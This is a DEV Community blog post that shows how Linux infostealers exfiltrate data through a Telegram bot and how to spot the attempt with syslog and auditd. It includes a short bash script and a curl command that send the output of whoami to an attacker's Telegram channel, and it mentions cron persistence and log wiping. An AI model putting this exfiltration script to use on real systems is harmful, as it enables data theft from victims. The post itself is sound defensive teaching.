DEV Community

Paula
Paula

Posted on

Linux Exfiltration

One of the most prominent threats right now is Infostealers. These would be a kind of malware that captures information from devices and sends the stolen data to an attacker. While this technique is integrated in other attacks (f.e. ransomware) it could work on its own, for selling, cyber espionage and more.

In the past months, one of the most popular exfiltration attempts was done through Telegram or Discord bots (as well as C2-Command and Control attempts).

I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!

Telegram bot

In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:

https://api.telegram.org/bot<BotToken>/getUpdates
Enter fullscreen mode Exit fullscreen mode

As described here, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:

curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'
Enter fullscreen mode Exit fullscreen mode

Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends the whoami output for the sake of the example. Of course, this could include way more things such as architecture, disk info and more. Most of there sort of samples will attempt to also check crypto wallet info.

Anyway, let's say we have the following script:

#!/bin/bash

messa=$(whoami)
mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"

curl $mycommand

Enter fullscreen mode Exit fullscreen mode

The Office character shushing as saying a secret

When this is executed, the username is sent to the channel.

name popping up in the channel

Now, most of these will install the script in cron usign crontab and delete the history log.

In case the crontab log is still intact, we will be able to see the crontab edition using cat /var/log/syslog | grep -w 'crontab'. But let's explore a cool option: auditd

Now, installing auditd is fairly simple. And while you can create your own rules, you can also use a default configuration and you are good to go!

Now, if we use sudo cat /var/log/audit/audit.log | grep telegram | grep api we would be able to see the attempt of our script!

Image description

Sometimes these attacks include messing up the /var/log so maybe having a backup in a different path could be useful, too.

Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )

If you are curious about analyzing real life samples, take a look at my older posts about setting a custom Linux Honeypot. Most of the things I capture are miners, which could use some common characteristics with info-stealers (messing up with cron for persistence, attempting enumeration, attempting Dynamic Linker Hijacking attack, and more).

Speedy emails, satisfied customers

Postmark Image

Are delayed transactional emails costing you user satisfaction? Postmark delivers your emails almost instantly, keeping your customers happy and connected.

Sign up

Top comments (2)

Collapse
 
jj profile image
Juan Julián Merelo Guervós

The exfiltrator stores their API key in plain text? Or is that encrypted somehow?

Collapse
 
nigel447 profile image
nigel447

time well spent reading this ++

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

👋 Kindness is contagious

Immerse yourself in a wealth of knowledge with this piece, supported by the inclusive DEV Community—every developer, no matter where they are in their journey, is invited to contribute to our collective wisdom.

A simple “thank you” goes a long way—express your gratitude below in the comments!

Gathering insights enriches our journey on DEV and fortifies our community ties. Did you find this article valuable? Taking a moment to thank the author can have a significant impact.

Okay